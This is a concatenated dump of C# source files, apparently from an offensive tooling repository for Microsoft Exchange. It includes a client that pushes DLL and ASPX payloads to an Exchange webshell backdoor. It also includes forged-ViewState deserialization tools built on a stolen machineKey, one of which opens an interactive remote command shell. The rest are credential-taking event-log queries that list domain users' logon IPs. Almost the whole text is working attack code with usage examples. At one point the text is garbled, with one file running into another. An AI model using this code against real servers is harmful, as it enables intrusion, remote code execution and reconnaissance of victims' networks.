91 | Console.WriteLine("[!] ERROR: {0}", e.Message); 92 | } 93 | } 94 | } 95 | } -------------------------------------------------------------------------------- /SharpExchangeBackdoor.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Net; 4 | using System.IO; 5 | using System.Web; 6 | 7 | namespace SharpExchangeBackdoor 8 | { 9 | public class Program 10 | { 11 | public static string HttpPostData(string url, string path) 12 | { 13 | Console.WriteLine("[*] Try to read: " + path); 14 | byte[] buffer = System.IO.File.ReadAllBytes(path); 15 | string base64str = Convert.ToBase64String(buffer); 16 | 17 | Console.WriteLine("[*] Try to access: " + url); 18 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 19 | HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest; 20 | request.Method = "POST"; 21 | request.ContentType = "application/x-www-form-urlencoded"; 22 | 
request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 23 | 24 | string Param = "demodata=" + HttpUtility.UrlEncode(base64str); 25 | byte[] post=Encoding.UTF8.GetBytes(Param); 26 | Stream postStream = request.GetRequestStream(); 27 | postStream.Write(post,0,post.Length); 28 | postStream.Close(); 29 | 30 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 31 | Stream instream = response.GetResponseStream(); 32 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 33 | string content = sr.ReadToEnd(); 34 | return content; 35 | } 36 | 37 | public static string HttpPostDataAuth(string url, string username, string password, string path) 38 | { 39 | string[] sArray = url.Split('/'); 40 | string newurl = "https://" + sArray[2] + "/owa/auth.owa"; 41 | Console.WriteLine("[*] Try to login"); 42 | 43 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 44 | HttpWebRequest request = WebRequest.Create(newurl) as HttpWebRequest; 45 | request.AllowAutoRedirect = false; 46 | request.Method = "POST"; 47 | request.ContentType = "application/x-www-form-urlencoded"; 48 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 49 | 50 | string Param = "destination=https%3A%2F%2F" + sArray[2] + "%2Fecp%2F&flags=4&forcedownlevel=0&username="+HttpUtility.UrlEncode(username)+"&password="+HttpUtility.UrlEncode(password)+"&passwordText=&isUtf8=1"; 51 | byte[] post=Encoding.UTF8.GetBytes(Param); 52 | 53 | Stream postStream = request.GetRequestStream(); 54 | postStream.Write(post,0,post.Length); 55 | postStream.Close(); 56 | 57 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 58 | if(response.StatusCode!=(HttpStatusCode)302) 59 | { 60 | Console.WriteLine("[!] 
Bad login response"); 61 | System.Environment.Exit(0); 62 | } 63 | 64 | string cookie = ""; 65 | if(response.Headers.GetValues("Set-Cookie")!=null) 66 | { 67 | foreach(string s in response.Headers.GetValues("Set-Cookie")) 68 | { 69 | cookie+=s.Split(' ')[0]+" "; 70 | } 71 | } 72 | 73 | if(cookie.IndexOf("cadataKey") == -1) 74 | { 75 | Console.WriteLine("[-] Wrong password"); 76 | System.Environment.Exit(0); 77 | } 78 | Console.WriteLine("[+] Login success"); 79 | 80 | Console.WriteLine("[*] Try to read: " + path); 81 | byte[] buffer = System.IO.File.ReadAllBytes(path); 82 | string base64str = Convert.ToBase64String(buffer); 83 | 84 | Console.WriteLine("[*] Try to access: " + url); 85 | request = WebRequest.Create(url) as HttpWebRequest; 86 | request.AllowAutoRedirect=false; 87 | request.Method = "POST"; 88 | request.ContentType = "application/x-www-form-urlencoded"; 89 | request.Headers.Add("Cookie",cookie); 90 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 91 | 92 | string Param2 = "demodata=" + HttpUtility.UrlEncode(base64str); 93 | byte[] post2=Encoding.UTF8.GetBytes(Param2); 94 | Stream postStream2 = request.GetRequestStream(); 95 | postStream2.Write(post2,0,post2.Length); 96 | postStream2.Close(); 97 | 98 | response = request.GetResponse() as HttpWebResponse; 99 | Stream instream = response.GetResponseStream(); 100 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 101 | string content = sr.ReadToEnd(); 102 | return content; 103 | } 104 | 105 | public static string HttpUploadFile(string url, string path) 106 | { 107 | Console.WriteLine("[*] Try to read: " + path); 108 | Console.WriteLine("[*] Try to access: " + url); 109 | 110 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 111 | HttpWebRequest request = WebRequest.Create(url) as HttpWebRequest; 112 | request.Method = "POST"; 
113 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 114 | string boundary = DateTime.Now.Ticks.ToString("X"); 115 | request.ContentType = "multipart/form-data;charset=utf-8;boundary=" + boundary; 116 | byte[] itemBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "\r\n"); 117 | byte[] endBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "--\r\n"); 118 | int pos = path.LastIndexOf("\\"); 119 | string fileName = path.Substring(pos + 1); 120 | 121 | StringBuilder sbHeader = new StringBuilder(string.Format("Content-Disposition:form-data;name=\"file\";filename=\"{0}\"\r\nContent-Type:application/octet-stream\r\n\r\n", fileName)); 122 | byte[] postHeaderBytes = Encoding.UTF8.GetBytes(sbHeader.ToString()); 123 | 124 | FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read); 125 | byte[] bArr = new byte[fs.Length]; 126 | fs.Read(bArr, 0, bArr.Length); 127 | fs.Close(); 128 | 129 | Stream postStream = request.GetRequestStream(); 130 | postStream.Write(itemBoundaryBytes, 0, itemBoundaryBytes.Length); 131 | postStream.Write(postHeaderBytes, 0, postHeaderBytes.Length); 132 | postStream.Write(bArr, 0, bArr.Length); 133 | postStream.Write(endBoundaryBytes, 0, endBoundaryBytes.Length); 134 | postStream.Close(); 135 | 136 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 137 | Stream instream = response.GetResponseStream(); 138 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 139 | string content = sr.ReadToEnd(); 140 | return content; 141 | } 142 | 143 | public static string HttpUploadFileAuth(string url, string username, string password, string path) 144 | { 145 | string[] sArray = url.Split('/'); 146 | string newurl = "https://" + sArray[2] + "/owa/auth.owa"; 147 | Console.WriteLine("[*] Try to login"); 148 | 149 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) 
=> { return true; }; 150 | HttpWebRequest request = WebRequest.Create(newurl) as HttpWebRequest; 151 | request.AllowAutoRedirect = false; 152 | request.Method = "POST"; 153 | request.ContentType = "application/x-www-form-urlencoded"; 154 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 155 | 156 | string Param = "destination=https%3A%2F%2F" + sArray[2] + "%2Fecp%2F&flags=4&forcedownlevel=0&username="+HttpUtility.UrlEncode(username)+"&password="+HttpUtility.UrlEncode(password)+"&passwordText=&isUtf8=1"; 157 | byte[] post=Encoding.UTF8.GetBytes(Param); 158 | 159 | Stream postStream = request.GetRequestStream(); 160 | postStream.Write(post,0,post.Length); 161 | postStream.Close(); 162 | 163 | HttpWebResponse response = request.GetResponse() as HttpWebResponse; 164 | if(response.StatusCode!=(HttpStatusCode)302) 165 | { 166 | Console.WriteLine("[!] Bad login response"); 167 | System.Environment.Exit(0); 168 | } 169 | 170 | string cookie = ""; 171 | if(response.Headers.GetValues("Set-Cookie")!=null) 172 | { 173 | foreach(string s in response.Headers.GetValues("Set-Cookie")) 174 | { 175 | cookie+=s.Split(' ')[0]+" "; 176 | } 177 | } 178 | 179 | if(cookie.IndexOf("cadataKey") == -1) 180 | { 181 | Console.WriteLine("[-] Wrong password"); 182 | System.Environment.Exit(0); 183 | } 184 | Console.WriteLine("[+] Login success"); 185 | 186 | Console.WriteLine("[*] Try to read: " + path); 187 | Console.WriteLine("[*] Try to access: " + url); 188 | 189 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 190 | request = WebRequest.Create(url) as HttpWebRequest; 191 | request.Method = "POST"; 192 | request.Headers.Add("Cookie",cookie); 193 | request.UserAgent="Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 194 | string boundary = 
DateTime.Now.Ticks.ToString("X"); 195 | request.ContentType = "multipart/form-data;charset=utf-8;boundary=" + boundary; 196 | byte[] itemBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "\r\n"); 197 | byte[] endBoundaryBytes = Encoding.UTF8.GetBytes("\r\n--" + boundary + "--\r\n"); 198 | int pos = path.LastIndexOf("\\"); 199 | string fileName = path.Substring(pos + 1); 200 | 201 | StringBuilder sbHeader = new StringBuilder(string.Format("Content-Disposition:form-data;name=\"file\";filename=\"{0}\"\r\nContent-Type:application/octet-stream\r\n\r\n", fileName)); 202 | byte[] postHeaderBytes = Encoding.UTF8.GetBytes(sbHeader.ToString()); 203 | 204 | FileStream fs = new FileStream(path, FileMode.Open, FileAccess.Read); 205 | byte[] bArr = new byte[fs.Length]; 206 | fs.Read(bArr, 0, bArr.Length); 207 | fs.Close(); 208 | 209 | Stream postStream2 = request.GetRequestStream(); 210 | postStream2.Write(itemBoundaryBytes, 0, itemBoundaryBytes.Length); 211 | postStream2.Write(postHeaderBytes, 0, postHeaderBytes.Length); 212 | postStream2.Write(bArr, 0, bArr.Length); 213 | postStream2.Write(endBoundaryBytes, 0, endBoundaryBytes.Length); 214 | postStream2.Close(); 215 | 216 | response = request.GetResponse() as HttpWebResponse; 217 | Stream instream = response.GetResponseStream(); 218 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 219 | string content = sr.ReadToEnd(); 220 | return content; 221 | } 222 | 223 | 224 | public static void ShowUsage() 225 | { 226 | string Usage = @" 227 | Use to send payload to the Exchange webshell backdoor. 228 | Support: 229 | assemblyLoad 230 | webshellWrite 231 | 232 | Usage: 233 | 234 | mode: 235 | assemblyLoad 236 | webshellWrite 237 | eg. 
238 | SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll 239 | SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx 240 | "; 241 | Console.WriteLine(Usage); 242 | } 243 | 244 | public static void Main(string[] args) 245 | { 246 | 247 | if(args.Length!=5) 248 | { 249 | ShowUsage(); 250 | System.Environment.Exit(0); 251 | } 252 | try 253 | { 254 | if(args[3] == "assemblyLoad") 255 | { 256 | Console.WriteLine("[*] Mode: assemblyLoad"); 257 | if((args[1] == "no") && (args[2] == "auth")) 258 | { 259 | Console.WriteLine("[*] Auth: Null"); 260 | string result = HttpPostData(args[0], args[4]); 261 | Console.WriteLine("[*] Response: \n" + result); 262 | } 263 | else 264 | { 265 | Console.WriteLine("[*] Auth: "+ args[1] + " " + args[2]); 266 | string result = HttpPostDataAuth(args[0], args[1], args[2], args[4]); 267 | Console.WriteLine("[*] Response: \n" + result); 268 | } 269 | } 270 | 271 | else if(args[3] == "webshellWrite") 272 | { 273 | Console.WriteLine("[*] Mode: webshellWrite"); 274 | if((args[1] == "no") && (args[2] == "auth")) 275 | { 276 | Console.WriteLine("[*] Auth: Null"); 277 | string result = HttpUploadFile(args[0], args[4]); 278 | Console.WriteLine("[*] Response: \n" + result); 279 | } 280 | else 281 | { 282 | Console.WriteLine("[*] Auth: "+ args[1] + " " + args[2]); 283 | string result = HttpUploadFileAuth(args[0], args[1], args[2], args[4]); 284 | Console.WriteLine("[*] Response: \n" + result); 285 | } 286 | } 287 | else 288 | { 289 | Console.WriteLine("[!] 
Wrong parameter"); 290 | } 291 | } 292 | catch (Exception e) 293 | { 294 | Console.WriteLine("{0}", e.Message); 295 | System.Environment.Exit(0); 296 | } 297 | } 298 | } 299 | } -------------------------------------------------------------------------------- /SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Net; 6 | using System.Web; 7 | using System.Globalization; 8 | using System.Security.Cryptography.X509Certificates; 9 | 10 | namespace SharpExchangeDeserializeShelltest 11 | { 12 | 13 | public class Program 14 | { 15 | 16 | 17 | static string xor(string s) 18 | { 19 | char[] a = s.ToCharArray(); 20 | for(int i = 0; i < a.Length; i++) 21 | a[i] = (char)(a[i] ^ 'x'); 22 | return new string(a); 23 | } 24 | 25 | static byte[] strToHexByte(string hexString) 26 | { 27 | if ((hexString.Length % 2) != 0) 28 | hexString += " "; 29 | byte[] returnBytes = new byte[hexString.Length / 2]; 30 | for (int i = 0; i < returnBytes.Length; i++) 31 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 32 | return returnBytes; 33 | } 34 | 35 | static string CreateViewState(byte[] dat,string generator,string key) 36 | { 37 | MemoryStream ms = new MemoryStream(); 38 | byte[] validationKey= strToHexByte(key); 39 | 40 | uint _clientstateid = 0; 41 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 42 | { 43 | System.Environment.Exit(0); 44 | } 45 | 46 | byte[] _mackey = new byte[4]; 47 | _mackey[0] = (byte)_clientstateid; 48 | _mackey[1] = (byte)(_clientstateid >> 8); 49 | _mackey[2] = (byte)(_clientstateid >> 16); 50 | _mackey[3] = (byte)(_clientstateid >> 24); 51 | 52 | ms = new MemoryStream(); 53 | ms.Write(dat,0,dat.Length); 54 | ms.Write(_mackey,0,_mackey.Length); 55 | byte[] hash=(new 
HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 56 | ms=new MemoryStream(); 57 | ms.Write(dat,0,dat.Length); 58 | ms.Write(hash,0,hash.Length); 59 | return Convert.ToBase64String(ms.ToArray()); 60 | } 61 | 62 | public static void ShowUsage() 63 | { 64 | string Usage = @" 65 | Use to test the deserializing code execution of Exchange. 66 | From read and write permissions of Exchange files to deserializing code execution. 67 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 68 | :owa or ecp 69 | 70 | Usage: 71 | 72 | : owa or ecp 73 | 74 | eg. 75 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 76 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 77 | 78 | "; 79 | Console.WriteLine(Usage); 80 | } 81 | 82 | public static void Main(string[] args) 83 | { 84 | 85 | if(args.Length!=3) 86 | { 87 | ShowUsage(); 88 | System.Environment.Exit(0); 89 | } 90 | try 91 | { 92 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 93 | 94 | string targeturl = ""; 95 | string generator = ""; 96 | if(args[2] =="owa") 97 | { 98 | targeturl = "https://" + args[0] + "/owa/auth/errorFE.aspx"; 99 | generator = "042A94E8"; 100 | 101 | } 102 | else if(args[2] =="ecp") 103 | { 104 | targeturl = "https://" + args[0] + "/ecp/auth/TimeoutLogout.aspx"; 105 | generator = "277B1C2A"; 106 | } 107 | else 108 | { 109 | Console.WriteLine("[!] 
Wrong input"); 110 | System.Environment.Exit(0); 111 | } 112 | string key = args[1]; 113 | Console.WriteLine("[*] TargetURL: " + targeturl); 114 | Console.WriteLine(); 115 | 116 | Console.WriteLine("[*] Trying to disable ActivitySurrogateSelectorTypeCheck"); 117 | 118 | string xaml_payload1 = "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"; 119 | 120 | byte[] payload1 = System.Convert.FromBase64String(xaml_payload1); 121 | string data1 = CreateViewState(payload1, generator, key); 122 | 123 | HttpWebRequest hwr1 = WebRequest.Create(targeturl) as HttpWebRequest; 124 | hwr1.AllowAutoRedirect = false; 125 | hwr1.Method = "POST"; 126 | hwr1.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 127 | hwr1.ContentType = "application/x-www-form-urlencoded"; 128 | hwr1.Proxy = null; 129 | byte[] post1 = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data1)+"&__VIEWSTATEGENERATOR="+generator); 130 | hwr1.ContentLength = post1.Length; 131 | hwr1.GetRequestStream().Write(post1,0,post1.Length); 132 | HttpWebResponse res1 = hwr1.GetResponse() as HttpWebResponse; 133 | Console.WriteLine(res1.StatusCode); 134 | 135 | string xaml_payload2 = "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"; 136 | 137 | byte[] payload2 = System.Convert.FromBase64String(xaml_payload2); 138 | string data2 = CreateViewState(payload2, generator, key); 139 | 140 | while (true) 141 | { 142 | Console.Write("Command >"); 143 | string command = Console.ReadLine(); 144 | 145 | if (command == "exit") 146 | break; 147 | command = xor(command); 148 | HttpWebRequest hwr = WebRequest.Create(targeturl) as HttpWebRequest; 149 | hwr.AllowAutoRedirect = false; 150 | hwr.Method = "POST"; 151 | hwr.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 152 | hwr.ContentType = "application/x-www-form-urlencoded"; 153 | hwr.Proxy = null; 
154 | byte[] post = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data2)+"&__VIEWSTATEGENERATOR="+generator+"&__Value="+HttpUtility.UrlEncode(command)); 155 | hwr.ContentLength = post.Length; 156 | hwr.GetRequestStream().Write(post,0,post.Length); 157 | HttpWebResponse res = hwr.GetResponse() as HttpWebResponse; 158 | Console.WriteLine(res.StatusCode); 159 | 160 | Stream instream = res.GetResponseStream(); 161 | StreamReader sr = new StreamReader(instream, Encoding.UTF8); 162 | string content = sr.ReadToEnd(); 163 | Console.WriteLine(xor(content)); 164 | } 165 | } 166 | 167 | catch (Exception e) 168 | { 169 | Console.WriteLine("{0}", e.Message); 170 | System.Environment.Exit(0); 171 | } 172 | } 173 | 174 | } 175 | } 176 | -------------------------------------------------------------------------------- /SharpExchangeDeserializeShell-NoAuth-ghostfile.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Net; 6 | using System.Web; 7 | using System.Globalization; 8 | using System.Security.Cryptography.X509Certificates; 9 | 10 | namespace SharpExchangeDeserializeShelltest 11 | { 12 | 13 | public class Program 14 | { 15 | static byte[] strToHexByte(string hexString) 16 | { 17 | if ((hexString.Length % 2) != 0) 18 | hexString += " "; 19 | byte[] returnBytes = new byte[hexString.Length / 2]; 20 | for (int i = 0; i < returnBytes.Length; i++) 21 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 22 | return returnBytes; 23 | } 24 | 25 | static string CreateViewState(byte[] dat,string generator,string key) 26 | { 27 | MemoryStream ms = new MemoryStream(); 28 | byte[] validationKey= strToHexByte(key); 29 | 30 | uint _clientstateid = 0; 31 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 32 | { 33 | System.Environment.Exit(0); 34 | } 35 | 36 
| byte[] _mackey = new byte[4]; 37 | _mackey[0] = (byte)_clientstateid; 38 | _mackey[1] = (byte)(_clientstateid >> 8); 39 | _mackey[2] = (byte)(_clientstateid >> 16); 40 | _mackey[3] = (byte)(_clientstateid >> 24); 41 | 42 | ms = new MemoryStream(); 43 | ms.Write(dat,0,dat.Length); 44 | ms.Write(_mackey,0,_mackey.Length); 45 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 46 | ms=new MemoryStream(); 47 | ms.Write(dat,0,dat.Length); 48 | ms.Write(hash,0,hash.Length); 49 | return Convert.ToBase64String(ms.ToArray()); 50 | } 51 | 52 | public static void ShowUsage() 53 | { 54 | string Usage = @" 55 | Use to test the deserializing code execution of Exchange. 56 | 57 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 58 | :owa or ecp 59 | 60 | Usage: 61 | 62 | : owa or ecp 63 | 64 | eg. 65 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 66 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 67 | 68 | "; 69 | Console.WriteLine(Usage); 70 | } 71 | 72 | public static void Main(string[] args) 73 | { 74 | 75 | if(args.Length!=3) 76 | { 77 | ShowUsage(); 78 | System.Environment.Exit(0); 79 | } 80 | try 81 | { 82 | ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => { return true; }; 83 | 84 | string targeturl = ""; 85 | string generator = ""; 86 | if(args[2] =="owa") 87 | { 88 | targeturl = "https://" + args[0] + "/owa/auth/errorFE.aspx"; 89 | generator = "042A94E8"; 90 | 91 | } 92 | else if(args[2] =="ecp") 93 | { 94 | targeturl = "https://" + args[0] + "/ecp/auth/TimeoutLogout.aspx"; 95 | generator = "277B1C2A"; 96 | } 97 | else 98 | { 99 | Console.WriteLine("[!] 
Wrong input"); 100 | System.Environment.Exit(0); 101 | } 102 | string key = args[1]; 103 | Console.WriteLine("[*] TargetURL: " + targeturl); 104 | Console.WriteLine(); 105 | 106 | 107 | string xaml_payload2 = "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"; 108 | 109 | byte[] payload2 = System.Convert.FromBase64String(xaml_payload2); 110 | string data2 = CreateViewState(payload2, generator, key); 111 | 112 | HttpWebRequest hwr = WebRequest.Create(targeturl) as HttpWebRequest; 113 | hwr.AllowAutoRedirect = false; 114 | hwr.Method = "POST"; 115 | hwr.UserAgent = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36xxxxx"; 116 | hwr.ContentType = "application/x-www-form-urlencoded"; 117 | hwr.Headers.Add("Value", "00HGAT3K0AXHV2RF2W0G"); 118 | hwr.Proxy = null; 119 | byte[] post = Encoding.UTF8.GetBytes("__VIEWSTATE="+HttpUtility.UrlEncode(data2)+"&__VIEWSTATEGENERATOR="+generator); 120 | hwr.ContentLength = post.Length; 121 | hwr.GetRequestStream().Write(post,0,post.Length); 122 | HttpWebResponse res = hwr.GetResponse() as HttpWebResponse; 123 | Console.WriteLine(res.StatusCode); 124 | 125 | for(int i=0;i 21 | target: 22 | - localhost 23 | - domain\username:password@server 24 | query: 25 | - all 26 | - Event/System/TimeCreated/@SystemTime>='2022-01-01T00:00:00' 27 | 28 | Eg: 29 | SharpGetUserLoginIPRPC.exe localhost all 30 | SharpGetUserLoginIPRPC.exe test.com\administrator:password@123@192.168.1.1 ""Event/System/TimeCreated/@SystemTime >= '2022-01-26T02:30:39' and Event/System/TimeCreated/@SystemTime <= '2022-01-26T02:31:00'"" 31 | 32 | "; 33 | Console.WriteLine(Usage); 34 | } 35 | 36 | static void Main(String[] args) 37 | { 38 | if (args.Length != 2) 39 | { 40 | ShowUsage(); 41 | System.Environment.Exit(0); 42 | } 43 | try 44 | { 45 | EventLogSession session; 46 | String queryPath; 47 | if (args[0] == "localhost") 48 | { 49 | Console.WriteLine("[*] Try to query local eventlog"); 50 | session = 
new EventLogSession(); 51 | } 52 | else 53 | { 54 | Console.WriteLine(args[0]); 55 | int pos1 = args[0].IndexOf("\\"); 56 | String domain = args[0].Substring(0, pos1); 57 | int pos2 = args[0].IndexOf(":"); 58 | String username = args[0].Substring(pos1+1, pos2-pos1-1); 59 | int pos3 = args[0].LastIndexOf("@"); 60 | String password = args[0].Substring(pos2+1, pos3-pos2-1); 61 | String server = args[0].Substring(pos3+1); 62 | Console.WriteLine("[*] Try to query remote eventlog"); 63 | Console.WriteLine(" Domain : " + domain); 64 | Console.WriteLine(" Username : " + username); 65 | Console.WriteLine(" Password : " + password); 66 | Console.WriteLine(" Server : " + server); 67 | SecureString securePwd = new SecureString(); 68 | foreach (char c in password) 69 | { 70 | securePwd.AppendChar(c); 71 | } 72 | session = new EventLogSession(server, domain, username, securePwd, SessionAuthentication.Negotiate); 73 | } 74 | if (args[1] == "all") 75 | queryPath = "(Event/System/EventID=4624)"; 76 | else 77 | queryPath = "(Event/System/EventID=4624) and " + args[1]; 78 | Console.WriteLine("[*] Try to query: " + queryPath); 79 | EventLogQuery eventLogQuery = new EventLogQuery("Security", PathType.LogName, queryPath) 80 | { 81 | Session = session, 82 | TolerateQueryErrors = true, 83 | ReverseDirection = true 84 | }; 85 | int flagTotal = 0; 86 | int flagExist = 0; 87 | using (EventLogReader eventLogReader = new EventLogReader(eventLogQuery)) 88 | { 89 | eventLogReader.Seek(System.IO.SeekOrigin.Begin, 0); 90 | do 91 | { 92 | EventRecord eventData = eventLogReader.ReadEvent(); 93 | if (eventData == null) 94 | break; 95 | flagTotal++; 96 | XmlDocument xmldoc = new XmlDocument(); 97 | xmldoc.LoadXml(eventData.ToXml()); 98 | XmlNodeList recordid = xmldoc.GetElementsByTagName("EventRecordID"); 99 | XmlNodeList data = xmldoc.GetElementsByTagName("Data"); 100 | String targetUserSid = data[4].InnerText; 101 | String targetDomainName = data[6].InnerText; 102 | String targetUserName = 
data[5].InnerText; 103 | String ipAddress = data[18].InnerText; 104 | if (targetUserSid.Length > 9 && ipAddress.Length > 8) 105 | { 106 | Console.WriteLine("[+] EventRecordID: " + recordid[0].InnerText); 107 | Console.WriteLine(" TimeCreated : " + eventData.TimeCreated); 108 | Console.WriteLine(" UserSid: " + targetUserSid); 109 | Console.WriteLine(" DomainName: " + targetDomainName); 110 | Console.WriteLine(" UserName: " + targetUserName); 111 | Console.WriteLine(" IpAddress: " + ipAddress); 112 | flagExist++; 113 | } 114 | eventData.Dispose(); 115 | } while (true); 116 | Console.WriteLine("Total: " + flagTotal + ", Exist: " + flagExist); 117 | } 118 | } 119 | catch (Exception e) 120 | { 121 | Console.WriteLine("[!] ERROR: {0}", e); 122 | } 123 | } 124 | } 125 | } -------------------------------------------------------------------------------- /SharpGetUserLoginIPWMI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management; 3 | namespace SharpGetUserLoginIPWMI 4 | { 5 | class Program 6 | { 7 | static void ShowUsage() 8 | { 9 | String Usage = @" 10 | SharpGetUserLoginIPWMI 11 | Use WMI to get the login IP of domain users through the event log. 
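/// <summary>
/// Entry point. Queries the Security event log through WMI (Win32_NTLogEvent), either on the
/// local machine or on a remote host, and prints the account and source address parsed out of
/// each record's message text.
/// </summary>
/// <param name="args">
/// args[0] is "localhost" or domain\username:password@server; args[1] is "all" or a WQL
/// condition that is appended to the query after "AND".
/// </param>
static void Main(String[] args)
{
    if (args.Length != 2)
    {
        ShowUsage();
        System.Environment.Exit(0);
    }
    try
    {
        ManagementScope s;
        if (args[0] == "localhost")
        {
            Console.WriteLine("[*] Try to query local eventlog");
            s = new ManagementScope("root\\CIMV2");
        }
        else
        {
            String target = args[0];
            int pos1 = target.IndexOf("\\");
            int pos2 = target.IndexOf(":");
            // The last '@' separates the server, so the password itself may contain '@'.
            int pos3 = target.LastIndexOf("@");
            if (pos1 < 0 || pos2 <= pos1 || pos3 <= pos2)
            {
                // Reject a malformed target up front instead of failing inside Substring.
                Console.WriteLine("[!] Bad target format, expected domain\\username:password@server");
                System.Environment.Exit(0);
            }
            String domain = target.Substring(0, pos1);
            String username = target.Substring(pos1 + 1, pos2 - pos1 - 1);
            String password = target.Substring(pos2 + 1, pos3 - pos2 - 1);
            String server = target.Substring(pos3 + 1);
            Console.WriteLine("[*] Try to query remote eventlog");
            Console.WriteLine(" Domain : " + domain);
            Console.WriteLine(" Username : " + username);
            // The credential is no longer echoed: console output is routinely captured in
            // transcripts and logs. It still arrives on the command line, where
            // process-creation auditing that records command lines will see it.
            Console.WriteLine(" Password : ********");
            Console.WriteLine(" Server : " + server);
            var opt = new ConnectionOptions();
            opt.Username = domain + "\\" + username;
            opt.Password = password;
            s = new ManagementScope("\\\\" + server + "\\root\\CIMV2", opt);
        }

        String queryPath;
        if (args[1] == "all")
            queryPath = "SELECT * FROM Win32_NTLogEvent Where Logfile = 'Security'";
        else
            // args[1] is concatenated verbatim into the WQL text.
            queryPath = "SELECT * FROM Win32_NTLogEvent Where Logfile = 'Security' AND " + args[1];
        Console.WriteLine("[*] Try to query: " + queryPath);
        SelectQuery q = new SelectQuery(queryPath);

        int flagTotal = 0;
        int flagExist = 0;
        using (ManagementObjectSearcher mos = new ManagementObjectSearcher(s, q))
        {
            foreach (ManagementObject o in mos.Get())
            {
                flagTotal++;
                object rawMessage = o.GetPropertyValue("Message");
                if (rawMessage == null)
                    continue; // a record without message text would otherwise abort the whole run
                String Message = rawMessage.ToString();

                // Field labels are located by their last occurrence in the message text.
                int pos1 = Message.LastIndexOf("Security ID");
                int pos2 = Message.LastIndexOf("Account Name");
                int pos3 = Message.LastIndexOf("Account Domain");
                int pos4 = Message.LastIndexOf("Logon ID");
                int pos5 = Message.LastIndexOf("Source Network Address");
                int pos6 = Message.LastIndexOf("Source Port");
                int length1 = pos2 - pos1 - 16;
                int length2 = pos4 - pos3 - 20;
                int length3 = pos3 - pos2 - 17;
                int length4 = pos6 - pos5 - 27;
                // A missing label, or labels in another order, yields a negative length: skip.
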